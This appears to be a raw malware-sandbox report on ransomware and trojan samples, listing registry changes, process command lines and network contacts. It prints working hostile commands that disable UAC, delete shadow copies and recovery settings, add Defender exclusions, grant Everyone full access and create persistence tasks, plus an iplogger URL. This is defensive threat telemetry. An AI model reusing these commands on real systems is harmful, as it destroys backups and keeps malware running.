Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\System32\L2SecHC\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\Desktop\6.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

outlook_office_path

Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A

outlook_win_path

Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe

"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "

C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe

"4363463463464363463463463.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

"[email protected]"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

"[email protected]"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

"[email protected]"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe

"RIP_YOUR_PC_LOL.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe

"x2s443bc.cs1.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Users\Admin\AppData\Local\Temp\is-KCIOL.tmp\x2s443bc.cs1.tmp

"C:\Users\Admin\AppData\Local\Temp\is-KCIOL.tmp\x2s443bc.cs1.tmp" /SL5="$6022C,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6021.tmp\6022.tmp\6023.bat C:\Users\Admin\Desktop\1.exe"

C:\Users\Admin\AppData\Local\Temp\is-SAI7O.tmp\ska2pwej.aeh.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SAI7O.tmp\ska2pwej.aeh.tmp" /SL5="$50236,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 139781704838811.bat

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Users\Admin\Desktop\1.exe

"C:\Users\Admin\Desktop\1.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe

"ska2pwej.aeh.exe"

C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe

"C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe

"bot.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument https://iplogger.org/2bB2s6

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\72A0.tmp\splitterrypted.vbs

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\754F.tmp\spwak.vbs

C:\Windows\SysWOW64\wscript.exe

C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\72A0.tmp\splitterrypted.vbs

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4756 CREDAT:17410 /prefetch:2

C:\Windows\SysWOW64\wscript.exe

C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\754F.tmp\spwak.vbs

C:\Users\Admin\Desktop\10.exe

"C:\Users\Admin\Desktop\10.exe"

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4f4 0x40c

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc" /o ""

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe"

C:\Users\Admin\AppData\Local\TEMPSP~1.EXE

C:\Users\Admin\AppData\Local\TEMPSP~1.EXE

C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe

"C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe"

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\3.xlsx"

C:\Users\Admin\Desktop\5.exe

"C:\Users\Admin\Desktop\5.exe"

C:\Users\Admin\Desktop\7.exe

"C:\Users\Admin\Desktop\7.exe"

C:\Users\Admin\Desktop\8.exe

"C:\Users\Admin\Desktop\8.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Endermanch@NoMoreRansom" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL\[email protected]'" /rl HIGHEST /f

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm" /o ""

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4363463463464363463463463" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463\4363463463464363463463463.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "x2s443bc.cs1.tmp" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\is-KCIOL.tmp\x2s443bc.cs1.tmp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Documents and Settings\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\dwm.exe'" /rl HIGHEST /f

C:\PROGRA~3\system.exe

C:\PROGRA~3\system.exe

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Endermanch@WannaCrypt0r" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\00000000\[email protected]'" /rl HIGHEST /f

C:\Users\Admin\Desktop\6.exe

"C:\Users\Admin\Desktop\6.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"

C:\Users\Admin\Desktop\6.exe

"C:\Users\Admin\Desktop\6.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"

C:\Program Files (x86)\Microsoft\DesktopLayer.exe

"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"

C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe

C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe

C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe

C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument https://iplogger.org/2bB2s6

C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe

C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe

C:\Users\Admin\AppData\Local\TEMPEX~1.EXE

C:\Users\Admin\AppData\Local\TEMPEX~1.EXE

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "8" /sc ONLOGON /tr "'C:\Documents and Settings\8.exe'" /rl HIGHEST /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.VisualElementsManifest\msedge.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "7" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\LockApprove.wma\7.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\sc\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\WerFault\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Admin\3D Objects\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Documents and Settings\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\L2SecHC\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\mpr\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0osCMtBs5W.bat"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b @[email protected] vs

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected] co

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected] vs

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___TSE06_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___OFH6S_.txt

C:\Windows\system32\wbem\wmic.exe

"C:\oad\s\nr\..\..\..\Windows\edk\iukg\ln\..\..\..\system32\uhknq\..\wbem\wwra\wb\tixbg\..\..\..\wmic.exe" shadowcopy delete

C:\Windows\System32\L2SecHC\dllhost.exe

"C:\Windows\System32\L2SecHC\dllhost.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C AT /delete /yes

C:\Windows\SysWOW64\at.exe

AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svchost.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svchost.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svchost.exe"

C:\Windows\SysWOW64\at.exe

AT /delete /yes

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF1E.tmp.bat""

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\ProgramData\AdobeReader\GeforceUpdater.exe

"C:\ProgramData\AdobeReader\GeforceUpdater.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn MicrosoftEdgeUpdateTaskMachineCoreCor /tr C:\ProgramData\AdobeReader\GeforceUpdater.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn MicrosoftEdgeUpdateTaskMachineCoreCor /tr C:\ProgramData\AdobeReader\GeforceUpdater.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MicrosoftEdgeUpdateTaskMachineCoreCor" /tr "C:\ProgramData\AdobeReader\GeforceUpdater.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im E

C:\Windows\SysWOW64\PING.EXE

ping -n 1 127.0.0.1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\A5D66A~1.EXE

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\A5D66A~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\A5D66A~1.EXE"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kcitlubheisxcn434" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5336 -ip 5336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 840

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kcitlubheisxcn434" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 848

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5336 -ip 5336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 848

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5336 -ip 5336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5336 -ip 5336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 848

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5336 -ip 5336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 1000

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 1008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5336 -ip 5336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 708

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5336 -ip 5336

C:\Windows\SysWOW64\taskkill.exe

taskkill /im A5D66A~1.EXE /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c taskkill /im A5D66A~1.EXE /f & erase C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\A5D66A~1.EXE & exit

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c taskkill /im "A5D66A~1.EXE" /f & erase "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\A5D66A~1.EXE" & exit

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\ProgramData\AdobeReader\GeforceUpdater.exe

C:\ProgramData\AdobeReader\GeforceUpdater.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4f4 0x40c

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4544 -ip 4544

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 912

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 5.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 8.8.8.8:53 stats.walliant.com udp
US 8.8.8.8:53 api.joinmassive.com udp
US 172.67.189.175:443 stats.walliant.com tcp
US 18.172.89.91:443 api.joinmassive.com tcp
US 8.8.8.8:53 91.89.172.18.in-addr.arpa udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 128.31.0.39:9101 tcp
US 8.8.8.8:53 unicorpbrunei.com udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
IN 103.14.122.111:80 unicorpbrunei.com tcp
US 8.8.8.8:53 111.122.14.103.in-addr.arpa udp
US 8.8.8.8:53 175.189.67.172.in-addr.arpa udp
US 8.8.8.8:53 api.bing.com udp
RU 91.218.114.4:80 91.218.114.4 tcp
US 8.8.8.8:53 4.114.218.91.in-addr.arpa udp
US 8.8.8.8:53 whatismyipaddress.com udp
RU 91.218.114.4:80 91.218.114.4 tcp
US 104.16.154.36:80 whatismyipaddress.com tcp
US 104.16.154.36:443 whatismyipaddress.com tcp
US 8.8.8.8:53 36.154.16.104.in-addr.arpa udp
RU 91.218.114.11:80 91.218.114.11 tcp
IE 93.107.12.0:6893 udp
IE 93.107.12.1:6893 udp
IE 93.107.12.2:6893 udp
IE 93.107.12.3:6893 udp
IE 93.107.12.4:6893 udp
IE 93.107.12.5:6893 udp
IE 93.107.12.6:6893 udp
IE 93.107.12.7:6893 udp
IE 93.107.12.8:6893 udp
IE 93.107.12.9:6893 udp
IE 93.107.12.10:6893 udp
IE 93.107.12.11:6893 udp
IE 93.107.12.12:6893 udp
IE 93.107.12.13:6893 udp
IE 93.107.12.14:6893 udp
IE 93.107.12.15:6893 udp
IE 93.107.12.16:6893 udp
IE 93.107.12.17:6893 udp
IE 93.107.12.18:6893 udp
IE 93.107.12.19:6893 udp
IE 93.107.12.20:6893 udp
IE 93.107.12.21:6893 udp
IE 93.107.12.22:6893 udp
IE 93.107.12.23:6893 udp
IE 93.107.12.24:6893 udp
IE 93.107.12.25:6893 udp
IE 93.107.12.26:6893 udp
IE 93.107.12.27:6893 udp
IE 93.107.12.28:6893 udp
IE 93.107.12.29:6893 udp
IE 93.107.12.30:6893 udp
IE 93.107.12.31:6893 udp
TR 95.1.200.0:6893 udp
TR 95.1.200.1:6893 udp
TR 95.1.200.2:6893 udp
TR 95.1.200.3:6893 udp
TR 95.1.200.4:6893 udp
TR 95.1.200.5:6893 udp
TR 95.1.200.6:6893 udp
TR 95.1.200.7:6893 udp
TR 95.1.200.8:6893 udp
TR 95.1.200.9:6893 udp
TR 95.1.200.10:6893 udp
TR 95.1.200.11:6893 udp
TR 95.1.200.12:6893 udp
TR 95.1.200.13:6893 udp
TR 95.1.200.14:6893 udp
TR 95.1.200.15:6893 udp
TR 95.1.200.16:6893 udp
